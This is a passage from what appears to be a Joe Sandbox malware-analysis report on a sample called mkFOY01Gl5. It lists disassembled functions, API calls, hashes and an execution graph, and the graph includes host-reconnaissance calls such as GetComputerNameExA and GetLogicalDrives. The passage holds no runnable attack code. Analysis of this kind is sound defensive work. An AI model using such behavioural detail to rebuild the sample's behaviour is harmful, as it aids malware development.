          • Part of subcall function 00105136: HeapAlloc.KERNEL32(00000000,00000001,?,?,000F7FC8,?,?,?,?,?,000F27FE,00000001,?), ref: 00105168
        • __freea.LIBCMT ref: 00107CC7
        • __freea.LIBCMT ref: 00107CD7
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __freea$__alloca_probe_16$AllocHeap
        • String ID:
        • API String ID: 1096550386-0
        • Opcode ID: b41c7ca242e359de933bb8f400620fded6b26b00b3e748210a8d55cb04d677e1
        • Instruction ID: 7215645e76d31f6a838366a5fdd59dcdaff0c08f8493f90e9566cffed5021df1
        • Opcode Fuzzy Hash: b41c7ca242e359de933bb8f400620fded6b26b00b3e748210a8d55cb04d677e1
        • Instruction Fuzzy Hash: 8B51A372A0820BAFEB249F648E81EBB77A9EF04350B150528FD44D62D1E7B1EC50D7A0
        Function 000F59BD Relevance: 7.6, APIs: 5, Instructions: 65COMMON
        Download Yara Rule
        APIs
        • __EH_prolog3.LIBCMT ref: 000F59C4
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F59CE
          • Part of subcall function 000F2CF0: std::_Lockit::_Lockit.LIBCPMT ref: 000F2CFF
          • Part of subcall function 000F2CF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000F2D1A
        • codecvt.LIBCPMT ref: 000F5A08
        • std::_Facet_Register.LIBCPMT ref: 000F5A1F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F5A3F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
        • String ID:
        • API String ID: 712880209-0
        • Opcode ID: db5a96a1b464d76f0fb5ca364bca3f128b1be9312e6fdfbee9e6cb760f703777
        • Instruction ID: e1c44116f7f2dc65e32c48640a98ebb256004537bc6ef2561a8ac35fb0f5a882
        • Opcode Fuzzy Hash: db5a96a1b464d76f0fb5ca364bca3f128b1be9312e6fdfbee9e6cb760f703777
        • Instruction Fuzzy Hash: DF11E131904628DFCB15EB68CD416FEB7F4AF44321F140519FA05A7A83DBB0AE40AB91
        Function 000F547A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • __EH_prolog3.LIBCMT ref: 000F5481
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F548C
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F54FA
          • Part of subcall function 000F55DD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000F55F5
        • std::locale::_Setgloballocale.LIBCPMT ref: 000F54A7
        • _Yarn.LIBCPMT ref: 000F54BD
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
        • String ID:
        • API String ID: 1088826258-0
        • Opcode ID: 0a863dd02cf13cd6ce6e78eba6ca87bf70f2c7a7a0551914295759797d53bfb8
        • Instruction ID: 1bebb5c8c59904c15501b6620b5c0d5f0b4689f659f1929d60e22454b0fff396
        • Opcode Fuzzy Hash: 0a863dd02cf13cd6ce6e78eba6ca87bf70f2c7a7a0551914295759797d53bfb8
        • Instruction Fuzzy Hash: 5B01D4756049189BC70AEF20DD515BD3BB2FF85341B144058EA1557B82CFB46E82DB85
        Function 000FB6F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,000FB6A3,00000000,00000001,0017057C,?,?,?,000FB846,00000004,InitializeCriticalSectionEx,00116EA0,InitializeCriticalSectionEx), ref: 000FB6FF
        • GetLastError.KERNEL32(?,000FB6A3,00000000,00000001,0017057C,?,?,?,000FB846,00000004,InitializeCriticalSectionEx,00116EA0,InitializeCriticalSectionEx,00000000,?,000FB5FD), ref: 000FB709
        • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,000FA513), ref: 000FB731
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID: api-ms-
        • API String ID: 3177248105-2084034818
        • Opcode ID: 904f401a43041464464b0de80a1b296cacf8507511157e6db8fc8b91ac5b216b
        • Instruction ID: 9218f30c26a7f75025bf5317206f9db83cc6a179ad354853b6ed57ef07e2977e
        • Opcode Fuzzy Hash: 904f401a43041464464b0de80a1b296cacf8507511157e6db8fc8b91ac5b216b
        • Instruction Fuzzy Hash: 74E04830244308F7DF102FA0DC46FA93BD59F54B50F144020FA4DE88E0D7619994B9C4
        Function 001081B7 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetConsoleOutputCP.KERNEL32(429EDEEC,00000000,00000000,00000000), ref: 0010821A
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00108475
        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001084BD
        • GetLastError.KERNEL32 ref: 00108560
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
        • String ID:
        • API String ID: 2112829910-0
        • Opcode ID: bd1d2466302dd17ede07108320a8f2a782b3bad4f2760b5760137a178ad0f261
        • Instruction ID: 827e9f8db76b88181383b7cd9ed45bf9dc769a65430f6d082518a9048a40107d
        • Opcode Fuzzy Hash: bd1d2466302dd17ede07108320a8f2a782b3bad4f2760b5760137a178ad0f261
        • Instruction Fuzzy Hash: 38D157B5D042589FCF15CFA8D880AEDBBB5FF49304F18812AE895EB391DB70A941CB50
        Function 000FA6C1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AdjustPointer
        • String ID:
        • API String ID: 1740715915-0
        • Opcode ID: 4f9f851db959218e17830b8af00069dd56df1b717bb8bba18e618a23a543018f
        • Instruction ID: 5cb5ebbee2f318620cf4c1f0c915555f89021c19c0c16e78d7437929ec8a56e3
        • Opcode Fuzzy Hash: 4f9f851db959218e17830b8af00069dd56df1b717bb8bba18e618a23a543018f
        • Instruction Fuzzy Hash: DB51A0B570830A9FDB29AF10D841FBAB7F4EF05310F144529EA0947D92D731AD81EB92
        Function 0010A7D3 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • GetLastError.KERNEL32 ref: 0010A837
        • __dosmaperr.LIBCMT ref: 0010A83E
        • GetLastError.KERNEL32(?,?,?,?), ref: 0010A878
        • __dosmaperr.LIBCMT ref: 0010A87F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
        • String ID:
        • API String ID: 1913693674-0
        • Opcode ID: fcc68f8aa47b56c619f24af6d59cc890f8586330904874d25a2023ea049201bd
        • Instruction ID: 27f9aae454ffaa80eb4bb1a8ffcfca07c57530293118df4010b29e7efd6d3e12
        • Opcode Fuzzy Hash: fcc68f8aa47b56c619f24af6d59cc890f8586330904874d25a2023ea049201bd
        • Instruction Fuzzy Hash: F1213431600305BFCB25AF65C88087BB7ADFF54325744C42AF99987591DBB0ED418792
        Function 00101056 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9215e8f8cdee4c11bc912f48d66ccc7efb7b65b9c55f56791336e9f1f2e5c672
        • Instruction ID: dbdd260330d1887509daa58869da346ec433de7917634637ae03f6bda72c91a9
        • Opcode Fuzzy Hash: 9215e8f8cdee4c11bc912f48d66ccc7efb7b65b9c55f56791336e9f1f2e5c672
        • Instruction Fuzzy Hash: 1921F33160020ABFCB28AF75CC819BBB7AAFF503647104524FA94D75D1D7B8ED8097A0
        Function 0010B769 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
        Download Yara Rule
        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 0010B771
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010B7A9
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010B7C9
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
        • String ID:
        • API String ID: 158306478-0
        • Opcode ID: 26374875e95989d8533ac79e8c9c06e7926ca0ac435fcf01b0f0a705d90de103
        • Instruction ID: 58fe56ff332e468e83bfe13ff3282bfebf328419279a1b49f0845722c9c5fb97
        • Opcode Fuzzy Hash: 26374875e95989d8533ac79e8c9c06e7926ca0ac435fcf01b0f0a705d90de103
        • Instruction Fuzzy Hash: 201144B1515606BFE71527B15CCDCAF3A6DDEE53987104021F941911C1FBB0CD004171
        Function 00112339 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000), ref: 00112350
        • GetLastError.KERNEL32(?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000,00000000,?,00108B3B,00000000), ref: 0011235C
          • Part of subcall function 00112322: CloseHandle.KERNEL32(FFFFFFFE,0011236C,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000,00000000), ref: 00112332
        • ___initconout.LIBCMT ref: 0011236C
          • Part of subcall function 001122E4: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00112313,001110E1,00000000,?,001085B4,00000000,00000000,00000000,00000000), ref: 001122F7
        • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000), ref: 00112381
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
        • String ID:
        • API String ID: 2744216297-0
        • Opcode ID: 49ae6610cefdca0f3cf267203827e0a9808e1634e438dd07b9a73f0e61b2f8bb
        • Instruction ID: f5baadfef3d0862aa1d5573a95b882c0f23340c3817140d9512280d33855c418
        • Opcode Fuzzy Hash: 49ae6610cefdca0f3cf267203827e0a9808e1634e438dd07b9a73f0e61b2f8bb
        • Instruction Fuzzy Hash: FDF01C36510115FBCF261FD5EC08AC93F66FB593A0B044124FA1889620C77288B0DB90
        Function 001145D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMON
        Download Yara Rule
        APIs
        • OffsetRect.USER32(00000000,00000000,00000000), ref: 001146F6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: OffsetRect
        • String ID: 0$Zatlat
        • API String ID: 177026234-1547964091
        • Opcode ID: a36b2adc7ad3738461c45556e0ba2813d37c7f6f60e487dec19341b0f06e36e2
        • Instruction ID: d1c73bc28031cf9b216b10297ae50eea4ff98c0bbe79e14ee49d7dfbd1f5649f
        • Opcode Fuzzy Hash: a36b2adc7ad3738461c45556e0ba2813d37c7f6f60e487dec19341b0f06e36e2
        • Instruction Fuzzy Hash: D291EE715083808BD314DF68C8597AFBBE0AFC9718F180A2CF5D89B692C7B5D588CB52
        Function 000FA3B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
        Download Yara Rule
        APIs
        • ___except_validate_context_record.LIBVCRUNTIME ref: 000FA3EF
        • __IsNonwritableInCurrentImage.LIBCMT ref: 000FA4A3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CurrentImageNonwritable___except_validate_context_record
        • String ID: csm
        • API String ID: 3480331319-1018135373
        • Opcode ID: 7f5542fe4f7f5e23926db67c0ed3b75b1c25ea5de84d1b68fdc7ca51a00dbf08
        • Instruction ID: 20e240c2408154878fad1320827c47271d12eb4ab7187b47d9d518e6c82c1aab
        • Opcode Fuzzy Hash: 7f5542fe4f7f5e23926db67c0ed3b75b1c25ea5de84d1b68fdc7ca51a00dbf08
        • Instruction Fuzzy Hash: 4441E570B0020C9BCF10DF68C844AAE7BF5AF86314F148155EA1C5B792D775AA45DF91
        Function 000FACBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • EncodePointer.KERNEL32(00000000,?), ref: 000FACE2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: EncodePointer
        • String ID: MOC$RCC
        • API String ID: 2118026453-2084237596
        • Opcode ID: 803c779bdeb309d26075986129b0280cf67d440b1b4b68acd172621882fdceea
        • Instruction ID: e967326541b286e09e0f442d2046458f54ef740d99c66d719a6954019fdac232
        • Opcode Fuzzy Hash: 803c779bdeb309d26075986129b0280cf67d440b1b4b68acd172621882fdceea
        • Instruction Fuzzy Hash: 044137B1A0020DEFCF16DF94C981AEEBBB5BF49301F188059FA096BA11D7359950EB52
        Function 000F2420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F2425
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F246A
          • Part of subcall function 000F5578: _Yarn.LIBCPMT ref: 000F5597
          • Part of subcall function 000F5578: _Yarn.LIBCPMT ref: 000F55BB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
        • String ID: bad locale name
        • API String ID: 1908188788-1405518554
        • Opcode ID: f01035ebc70e628acf4175206cd93298740384bf0b4643a53f4de55edc2c47e7
        • Instruction ID: 419aa35cea40038da27064ffa8e110ebecb7bcab7705fd21c93dfcd25d920eec
        • Opcode Fuzzy Hash: f01035ebc70e628acf4175206cd93298740384bf0b4643a53f4de55edc2c47e7
        • Instruction Fuzzy Hash: 60F01D71501B408ED370DF359804753BEE0AF29710F048A1DD6CAC7A42D375E548CBA6
        Function 000F2CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F2CFF
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2D1A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Lockitstd::_$Lockit::_Lockit::~_
        • String ID: ios_base::badbit set
        • API String ID: 593203224-3882152299
        • Opcode ID: 2c4f0108e3409b8ba7344c870b89e8469e6da7b2d8684fb64bff22280edd91ca
        • Instruction ID: 7353c0cd769a70aa45ae86d6086e26df815fe3d7086f464c05f70dcf05fbe12c
        • Opcode Fuzzy Hash: 2c4f0108e3409b8ba7344c870b89e8469e6da7b2d8684fb64bff22280edd91ca
        • Instruction Fuzzy Hash: 98E08C71404215CFD324DF14E881BE2B3E0EB24321F20047EE2C583991EBB058C0DB80
        Function 00102124 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CommandLine
        • String ID: %u
        • API String ID: 3253501508-749584840
        • Opcode ID: 4ed2f6fd6e9cb37ce257540d228c41b9d21b99ef4632ea622e07eff78136d972
        • Instruction ID: e4e940f132595d573d2655aaf2d7127bb39d4d1a379bbba6e589d67d20a6c1d0
        • Opcode Fuzzy Hash: 4ed2f6fd6e9cb37ce257540d228c41b9d21b99ef4632ea622e07eff78136d972
        • Instruction Fuzzy Hash: CBB048B8800710CF8B458FA8AA080893AB1FB8C3023A89056A84A82E20D63502C4ABA1

        Execution Graph

        Execution Coverage:15.1%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:18.2%
        Total number of Nodes:335
        Total number of Limit Nodes:25
        execution_graph 11441 428343 11443 428360 11441->11443 11442 42845b FreeLibrary 11444 42846a 11442->11444 11443->11442 11443->11443 11445 42847a GetComputerNameExA 11444->11445 11446 4284e6 GetComputerNameExA 11445->11446 11448 42861d 11446->11448 11449 41b840 11450 41b854 11449->11450 11452 41b93c 11449->11452 11453 41b990 11450->11453 11454 41b9ed 11453->11454 11454->11454 11457 43d6e0 11454->11457 11456 41bafd 11456->11452 11458 43d700 11457->11458 11459 43d86e 11458->11459 11461 43aac0 LdrInitializeThunk 11458->11461 11459->11456 11461->11459 11645 410f03 11646 410f44 11645->11646 11647 402a20 RtlFreeHeap 11646->11647 11648 41108a 11647->11648 11663 41f040 11648->11663 11650 4110a3 11674 41f890 11650->11674 11652 4110c3 11653 41fae0 LdrInitializeThunk 11652->11653 11654 4110e3 11653->11654 11655 4227b0 RtlAllocateHeap LdrInitializeThunk 11654->11655 11656 41110c 11655->11656 11657 422c30 RtlAllocateHeap LdrInitializeThunk 11656->11657 11658 411115 11657->11658 11659 424f10 LdrInitializeThunk 11658->11659 11660 411135 11659->11660 11661 430cf0 6 API calls 11660->11661 11662 41115e 11661->11662 11664 41f0c0 11663->11664 11665 43d6e0 LdrInitializeThunk 11664->11665 11666 41f2e7 11665->11666 11667 41f52a 11666->11667 11668 41f4fb 11666->11668 11671 41f4e4 11666->11671 11672 41f2f6 11666->11672 11669 41c100 LdrInitializeThunk 11667->11669 11668->11650 11669->11668 11670 41bfe0 LdrInitializeThunk 11670->11668 11671->11668 11671->11670 11671->11671 11673 43d6e0 LdrInitializeThunk 11672->11673 11673->11671 11675 41f939 11674->11675 11678 4199d0 11675->11678 11677 41fabb 11679 4199f0 11678->11679 11680 43d6e0 LdrInitializeThunk 11679->11680 11681 419a67 11680->11681 11682 41c100 LdrInitializeThunk 11681->11682 11683 419c0b 11681->11683 11682->11681 11683->11677 11684 43a100 GetLogicalDrives 11685 43a116 11684->11685 11462 417ac5 11464 417e8a 11462->11464 11465 417ad1 11462->11465 11465->11464 11465->11465 11466 43d6e0 LdrInitializeThunk 11465->11466 11467 402a20 11465->11467 11466->11465 11468 402b37 11467->11468 11469 402a2e 11467->11469 11470 402afe 11469->11470 11473 402a43 11469->11473 11476 402aa1 11469->11476 11471 402b24 11470->11471 11474 402a20 RtlFreeHeap 11470->11474 11481 4389c2 RtlFreeHeap 11471->11481 11472 402a83 11480 4389c2 RtlFreeHeap 11472->11480 11473->11468 11473->11472 11475 402a20 RtlFreeHeap 11473->11475 11474->11470 11475->11473 11482 4389c2 RtlFreeHeap 11476->11482 11686 41fc87 11688 41fc34 11686->11688 11687 43df00 2 API calls 11687->11688 11688->11686 11688->11687 11689 417009 11691 41704c 11689->11691 11692 416e0c 11689->11692 11694 416df5 11689->11694 11690 43d8c0 LdrInitializeThunk 11690->11692 11691->11694 11696 43aac0 LdrInitializeThunk 11691->11696 11692->11689 11692->11690 11692->11691 11692->11694 11695 43d4f0 LdrInitializeThunk 11692->11695 11695->11692 11696->11694 11697 43b00a 11698 43b053 11697->11698 11699 43b0ce 11698->11699 11701 43aac0 LdrInitializeThunk 